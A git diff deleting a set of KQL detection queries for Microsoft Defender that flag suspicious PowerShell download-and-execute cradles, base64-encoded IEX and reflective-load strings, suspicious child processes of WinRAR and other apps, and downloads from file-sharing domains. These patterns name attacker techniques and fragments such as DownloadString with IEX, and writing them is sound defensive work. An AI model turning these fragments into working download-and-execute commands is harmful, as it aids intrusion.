a/Execution/Potentially_Suspicious_Child_Process_Of_WinRAR.EXE.kql b/Execution/Potentially_Suspicious_Child_Process_Of_WinRAR.EXE.kql deleted file mode 100644 index 0c3792ca..00000000 --- a/Execution/Potentially_Suspicious_Child_Process_Of_WinRAR.EXE.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/08/31 -// Level: medium -// Description: Detects potentially suspicious child processes of WinRAR.exe. -// Tags: attack.execution, attack.t1203 -DeviceProcessEvents -| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "mshta.exe", "PowerShell.EXE", "pwsh.dll", "regsvr32.exe", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\WinRAR.exe" \ No newline at end of file diff --git a/Execution/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql b/Execution/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql deleted file mode 100644 index a30d1353..00000000 --- a/Execution/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Swachchhanda Shrawan Poudel -// Date: 2024/05/13 -// Level: medium -// Description: Detects potentially suspicious child processes of KeyScrambler.exe -// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1203, attack.t1574.002 -DeviceProcessEvents -| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "mshta.exe", "PowerShell.EXE", "pwsh.dll", "regsvr32.exe", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\KeyScrambler.exe" \ No newline at end of file 
diff --git a/Execution/Potentially_Suspicious_Electron_Application_CommandLine.kql b/Execution/Potentially_Suspicious_Electron_Application_CommandLine.kql deleted file mode 100644 index 9450e461..00000000 --- a/Execution/Potentially_Suspicious_Electron_Application_CommandLine.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/09/05 -// Level: medium -// Description: Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary. -// Tags: attack.execution -DeviceProcessEvents -| where (ProcessCommandLine contains "--browser-subprocess-path" or ProcessCommandLine contains "--gpu-launcher" or ProcessCommandLine contains "--renderer-cmd-prefix" or ProcessCommandLine contains "--utility-cmd-prefix") and ((FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\code.exe" or FolderPath endswith "\\discord.exe" or FolderPath endswith "\\GitHubDesktop.exe" or FolderPath endswith "\\keybase.exe" or FolderPath endswith "\\msedge_proxy.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\msedgewebview2.exe" or FolderPath endswith "\\msteams.exe" or FolderPath endswith "\\slack.exe" or FolderPath endswith "\\Teams.exe") or (ProcessVersionInfoOriginalFileName in~ ("chrome.exe", "code.exe", "discord.exe", "GitHubDesktop.exe", "keybase.exe", "msedge_proxy.exe", "msedge.exe", "msedgewebview2.exe", "msteams.exe", "slack.exe", "Teams.exe"))) \ No newline at end of file diff --git a/Execution/Potentially_Suspicious_Execution_Of_PDQDeployRunner.kql b/Execution/Potentially_Suspicious_Execution_Of_PDQDeployRunner.kql deleted file mode 100644 index b775a211..00000000 --- a/Execution/Potentially_Suspicious_Execution_Of_PDQDeployRunner.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/22 -// Level: medium -// Description: Detects suspicious execution of "PDQDeployRunner" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines -// Tags: attack.execution -DeviceProcessEvents -| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\csc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe") or (FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\TEMP\\" or FolderPath contains "\\AppData\\Local\\Temp") or (ProcessCommandLine contains " -decode " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -encodedcommand " or ProcessCommandLine contains " -w hidden" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "http" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "Invoke-")) and InitiatingProcessFolderPath contains "\\PDQDeployRunner-" \ No newline at end of file diff --git a/Execution/Potentially_Suspicious_File_Download_From_File_Sharing_Domain_Via_PowerShell.EXE.kql b/Execution/Potentially_Suspicious_File_Download_From_File_Sharing_Domain_Via_PowerShell.EXE.kql deleted file mode 100644 index d5ba34b0..00000000 --- a/Execution/Potentially_Suspicious_File_Download_From_File_Sharing_Domain_Via_PowerShell.EXE.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024/02/23 -// Level: high -// Description: Detects potentially suspicious file downloads from file sharing domains using PowerShell.exe -// Tags: attack.execution -DeviceProcessEvents -| where (ProcessCommandLine contains ".DownloadString(" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget ") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "cdn.discordapp.com/attachments/" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "ufile.io") \ No newline at end of file 
diff --git a/Execution/Potentially_Suspicious_PowerShell_Child_Processes.kql b/Execution/Potentially_Suspicious_PowerShell_Child_Processes.kql deleted file mode 100644 index 9a025e0f..00000000 --- a/Execution/Potentially_Suspicious_PowerShell_Child_Processes.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Tim Shelton -// Date: 2022/04/26 -// Level: high -// Description: Detects potentially suspicious child processes spawned by PowerShell -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and (InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) and (not((ProcessCommandLine contains "\\Program Files\\Amazon\\WorkspacesConfig\\Scripts\\" and InitiatingProcessCommandLine contains "\\Program Files\\Amazon\\WorkspacesConfig\\Scripts\\"))) \ No newline at end of file diff --git a/Execution/Potentially_Suspicious_WebDAV_LNK_Execution.kql b/Execution/Potentially_Suspicious_WebDAV_LNK_Execution.kql deleted file mode 100644 index f6568258..00000000 --- a/Execution/Potentially_Suspicious_WebDAV_LNK_Execution.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Micah Babinski -// Date: 2023/08/21 -// Level: medium -// Description: Detects possible execution via LNK file accessed on a WebDAV server. -// Tags: attack.execution, attack.t1059.001, attack.t1204 -DeviceProcessEvents -| where ProcessCommandLine contains "\\DavWWWRoot\\" and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\explorer.exe" \ No newline at end of file diff --git a/Execution/PowerShell_Base64_Encoded_FromBase64String_Cmdlet.kql b/Execution/PowerShell_Base64_Encoded_FromBase64String_Cmdlet.kql deleted file mode 100644 index e2931fc4..00000000 --- a/Execution/PowerShell_Base64_Encoded_FromBase64String_Cmdlet.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/08/24 -// Level: high -// Description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line -// Tags: attack.defense_evasion, attack.t1140, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine contains "OjpGcm9tQmFzZTY0U3RyaW5n" or ProcessCommandLine contains "o6RnJvbUJhc2U2NFN0cmluZ" or ProcessCommandLine contains "6OkZyb21CYXNlNjRTdHJpbm" or (ProcessCommandLine contains "OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA" or ProcessCommandLine contains "oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA" or ProcessCommandLine contains "6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw") \ No newline at end of file diff --git a/Execution/PowerShell_Base64_Encoded_IEX_Cmdlet.kql b/Execution/PowerShell_Base64_Encoded_IEX_Cmdlet.kql deleted file mode 100644 index 3f4eb318..00000000 --- a/Execution/PowerShell_Base64_Encoded_IEX_Cmdlet.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/08/23 -// Level: high -// Description: Detects usage of a base64 encoded "IEX" cmdlet in a process command line -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "SUVYIChb" or ProcessCommandLine contains "lFWCAoW" or ProcessCommandLine contains "JRVggKF" or ProcessCommandLine contains "aWV4IChb" or ProcessCommandLine contains "lleCAoW" or ProcessCommandLine contains "pZXggKF" or ProcessCommandLine contains "aWV4IChOZX" or ProcessCommandLine contains "lleCAoTmV3" or ProcessCommandLine contains "pZXggKE5ld" or ProcessCommandLine contains "SUVYIChOZX" or ProcessCommandLine contains "lFWCAoTmV3" or ProcessCommandLine contains "JRVggKE5ld" or ProcessCommandLine contains "SUVYKF" or ProcessCommandLine contains "lFWChb" or ProcessCommandLine contains "JRVgoW" or ProcessCommandLine contains "aWV4KF" or ProcessCommandLine contains "lleChb" or ProcessCommandLine contains "pZXgoW" or ProcessCommandLine contains "aWV4KE5ld" or ProcessCommandLine contains "lleChOZX" or ProcessCommandLine contains "pZXgoTmV3" or ProcessCommandLine contains "SUVYKE5ld" or ProcessCommandLine contains "lFWChOZX" or ProcessCommandLine contains "JRVgoTmV3" or ProcessCommandLine contains "SUVYKCgn" or ProcessCommandLine contains "lFWCgoJ" or ProcessCommandLine contains "JRVgoKC" or ProcessCommandLine contains "aWV4KCgn" or ProcessCommandLine contains "lleCgoJ" or ProcessCommandLine contains "pZXgoKC") or (ProcessCommandLine contains "SQBFAFgAIAAoAFsA" or ProcessCommandLine contains "kARQBYACAAKABbA" or ProcessCommandLine contains "JAEUAWAAgACgAWw" or ProcessCommandLine contains "aQBlAHgAIAAoAFsA" or ProcessCommandLine contains "kAZQB4ACAAKABbA" or ProcessCommandLine contains "pAGUAeAAgACgAWw" or ProcessCommandLine contains "aQBlAHgAIAAoAE4AZQB3A" or ProcessCommandLine contains "kAZQB4ACAAKABOAGUAdw" or ProcessCommandLine contains "pAGUAeAAgACgATgBlAHcA" or ProcessCommandLine 
contains "SQBFAFgAIAAoAE4AZQB3A" or ProcessCommandLine contains "kARQBYACAAKABOAGUAdw" or ProcessCommandLine contains "JAEUAWAAgACgATgBlAHcA") \ No newline at end of file diff --git a/Execution/PowerShell_Base64_Encoded_Invoke_Keyword.kql b/Execution/PowerShell_Base64_Encoded_Invoke_Keyword.kql deleted file mode 100644 index be3160c2..00000000 --- a/Execution/PowerShell_Base64_Encoded_Invoke_Keyword.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t -// Date: 2022/05/20 -// Level: high -// Description: Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls -// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027 -DeviceProcessEvents -| where ProcessCommandLine contains " -e" and (ProcessCommandLine contains "SQBuAHYAbwBrAGUALQ" or ProcessCommandLine contains "kAbgB2AG8AawBlAC0A" or ProcessCommandLine contains "JAG4AdgBvAGsAZQAtA" or ProcessCommandLine contains "SW52b2tlL" or ProcessCommandLine contains "ludm9rZS" or ProcessCommandLine contains "JbnZva2Ut") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/Execution/PowerShell_Base64_Encoded_Reflective_Assembly_Load.kql b/Execution/PowerShell_Base64_Encoded_Reflective_Assembly_Load.kql deleted file mode 100644 index 7b67f975..00000000 --- a/Execution/PowerShell_Base64_Encoded_Reflective_Assembly_Load.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems), pH-T (Nextron Systems) -// Date: 2022/03/01 -// Level: high -// Description: Detects base64 encoded .NET reflective loading of Assembly -// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027, attack.t1620 -DeviceProcessEvents -| where ProcessCommandLine contains "WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA" or ProcessCommandLine contains "sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA" or ProcessCommandLine contains "bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA" or ProcessCommandLine contains "AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC" or ProcessCommandLine contains "BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp" or ProcessCommandLine contains "AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK" or ProcessCommandLine contains "WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ" or ProcessCommandLine contains "sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA" or ProcessCommandLine contains "bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA" or ProcessCommandLine contains "WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA" or ProcessCommandLine contains "sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA" or ProcessCommandLine contains "bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA" \ No newline at end of file diff --git a/Execution/PowerShell_Base64_Encoded_WMI_Classes.kql b/Execution/PowerShell_Base64_Encoded_WMI_Classes.kql deleted file mode 100644 index 78c3b4de..00000000 --- a/Execution/PowerShell_Base64_Encoded_WMI_Classes.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/30 -// Level: high -// Description: Detects calls to base64 encoded WMI class such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc. -// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027 -DeviceProcessEvents -| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and ((ProcessCommandLine contains "VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA" or ProcessCommandLine contains "cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg" or ProcessCommandLine contains "V2luMzJfTG9nZ2VkT25Vc2Vy" or ProcessCommandLine contains "dpbjMyX0xvZ2dlZE9uVXNlc" or ProcessCommandLine contains "XaW4zMl9Mb2dnZWRPblVzZX") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw" or ProcessCommandLine contains "cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA" or ProcessCommandLine contains "V2luMzJfUHJvY2Vzc" or ProcessCommandLine contains "dpbjMyX1Byb2Nlc3" or ProcessCommandLine contains "XaW4zMl9Qcm9jZXNz") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA" or ProcessCommandLine contains "cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg" or ProcessCommandLine contains "V2luMzJfU2NoZWR1bGVkSm9i" or ProcessCommandLine contains "dpbjMyX1NjaGVkdWxlZEpvY" or ProcessCommandLine contains "XaW4zMl9TY2hlZHVsZWRKb2") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ" or ProcessCommandLine contains "cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A" or ProcessCommandLine contains 
"V2luMzJfU2hhZG93Y29we" or ProcessCommandLine contains "dpbjMyX1NoYWRvd2NvcH" or ProcessCommandLine contains "XaW4zMl9TaGFkb3djb3B5") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A" or ProcessCommandLine contains "cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA" or ProcessCommandLine contains "V2luMzJfVXNlckFjY291bn" or ProcessCommandLine contains "dpbjMyX1VzZXJBY2NvdW50" or ProcessCommandLine contains "XaW4zMl9Vc2VyQWNjb3Vud")) \ No newline at end of file diff --git a/Execution/PowerShell_Core_DLL_Loaded_By_Non_PowerShell_Process.kql b/Execution/PowerShell_Core_DLL_Loaded_By_Non_PowerShell_Process.kql deleted file mode 100644 index 1036a4ff..00000000 --- a/Execution/PowerShell_Core_DLL_Loaded_By_Non_PowerShell_Process.kql +++ /dev/null 
@@ -1,9 +0,0 @@ -// Author: Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2019/11/14 -// Level: medium -// Description: Detects loading of essential DLLs used by PowerShell by non-PowerShell process. -Detects behavior similar to meterpreter's "load powershell" extension. - -// Tags: attack.t1059.001, attack.execution -DeviceImageLoadEvents -| where (InitiatingProcessVersionInfoFileDescription =~ "System.Management.Automation" or InitiatingProcessVersionInfoOriginalFileName =~ "System.Management.Automation.dll" or (FolderPath endswith "\\System.Management.Automation.dll" or FolderPath endswith "\\System.Management.Automation.ni.dll")) and (not((((InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\") and InitiatingProcessFolderPath endswith "\\mscorsvw.exe") or (InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\dsac.exe" or InitiatingProcessFolderPath endswith ":\\WINDOWS\\System32\\RemoteFXvGPUDisablement.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\runscripthelper.exe" or InitiatingProcessFolderPath endswith ":\\WINDOWS\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\ServerManager.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\SyncAppvPublishingServer.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\winrshost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\wsmprovhost.exe" or InitiatingProcessFolderPath endswith 
":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\winrshost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\wsmprovhost.exe")))) and (not((isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath contains ":\\ProgramData\\chocolatey\\choco.exe" or InitiatingProcessFolderPath endswith "\\Citrix\\ConfigSync\\ConfigSyncRun.exe" or (InitiatingProcessFolderPath contains ":\\Windows\\Temp\\asgard2-agent\\" and (InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\thor.exe")) or ((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft SQL Server Management Studio" or InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft SQL Server Management Studio") and InitiatingProcessFolderPath endswith "\\IDE\\Ssms.exe") or ((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft SQL Server\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft SQL Server\\") and InitiatingProcessFolderPath endswith "\\Tools\\Binn\\SQLPS.exe") or (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Visual Studio\\")))) \ No newline at end of file diff --git a/Execution/PowerShell_DownloadFile.kql b/Execution/PowerShell_DownloadFile.kql deleted file mode 100644 index da7ff4be..00000000 --- a/Execution/PowerShell_DownloadFile.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2020/08/28 -// Level: high -// Description: Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line -// Tags: attack.execution, attack.t1059.001, attack.command_and_control, attack.t1104, attack.t1105 -DeviceProcessEvents -| where ProcessCommandLine contains "powershell" and ProcessCommandLine contains ".DownloadFile" and ProcessCommandLine contains "System.Net.WebClient" \ No newline at end of file diff --git a/Execution/PowerShell_Download_Pattern.kql b/Execution/PowerShell_Download_Pattern.kql deleted file mode 100644 index cdfb87e6..00000000 --- a/Execution/PowerShell_Download_Pattern.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro -// Date: 2019/01/16 -// Level: medium -// Description: Detects a Powershell process that contains download commands in its command line string -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ((ProcessCommandLine contains "string(" or ProcessCommandLine contains "file(") and (ProcessCommandLine contains "new-object" and ProcessCommandLine contains "net.webclient)." and ProcessCommandLine contains "download")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/Execution/PowerShell_Download_and_Execution_Cradles.kql b/Execution/PowerShell_Download_and_Execution_Cradles.kql deleted file mode 100644 index 9e3c6d09..00000000 --- a/Execution/PowerShell_Download_and_Execution_Cradles.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/03/24 -// Level: high -// Description: Detects PowerShell download and execution cradles. -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where (ProcessCommandLine contains ".DownloadString(" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "iwr ") and (ProcessCommandLine contains ";iex $" or ProcessCommandLine contains "| IEX" or ProcessCommandLine contains "|IEX " or ProcessCommandLine contains "I`E`X" or ProcessCommandLine contains "I`EX" or ProcessCommandLine contains "IE`X" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "IEX (" or ProcessCommandLine contains "IEX(" or ProcessCommandLine contains "Invoke-Expression") \ No newline at end of file diff --git a/Execution/PowerShell_Execution_With_Potential_Decryption_Capabilities.kql b/Execution/PowerShell_Execution_With_Potential_Decryption_Capabilities.kql deleted file mode 100644 index 5a6718b4..00000000 --- a/Execution/PowerShell_Execution_With_Potential_Decryption_Capabilities.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/06/30 -// Level: high -// Description: Detects PowerShell commands that decrypt an ".LNK" "file to drop the next stage of the malware. -// Tags: attack.execution -DeviceProcessEvents -| where (ProcessCommandLine contains "Get-ChildItem " or ProcessCommandLine contains "dir " or ProcessCommandLine contains "gci " or ProcessCommandLine contains "ls ") and (ProcessCommandLine contains "Get-Content " or ProcessCommandLine contains "gc " or ProcessCommandLine contains "cat " or ProcessCommandLine contains "type " or ProcessCommandLine contains "ReadAllBytes") and ((ProcessCommandLine contains " ^| " and ProcessCommandLine contains "*.lnk" and ProcessCommandLine contains "-Recurse" and ProcessCommandLine contains "-Skip ") or (ProcessCommandLine contains " -ExpandProperty " and ProcessCommandLine contains "*.lnk" and ProcessCommandLine contains "WriteAllBytes" and ProcessCommandLine contains " .length ")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/Execution/PowerShell_Script_Execution_Policy_Enabled.kql b/Execution/PowerShell_Script_Execution_Policy_Enabled.kql deleted file mode 100644 index 003aa763..00000000 --- a/Execution/PowerShell_Script_Execution_Policy_Enabled.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Thurein Oo -// Date: 2023/10/18 -// Level: low -// Description: Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed. -// Tags: attack.execution -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Policies\\Microsoft\\Windows\\PowerShell\\EnableScripts" \ No newline at end of file 
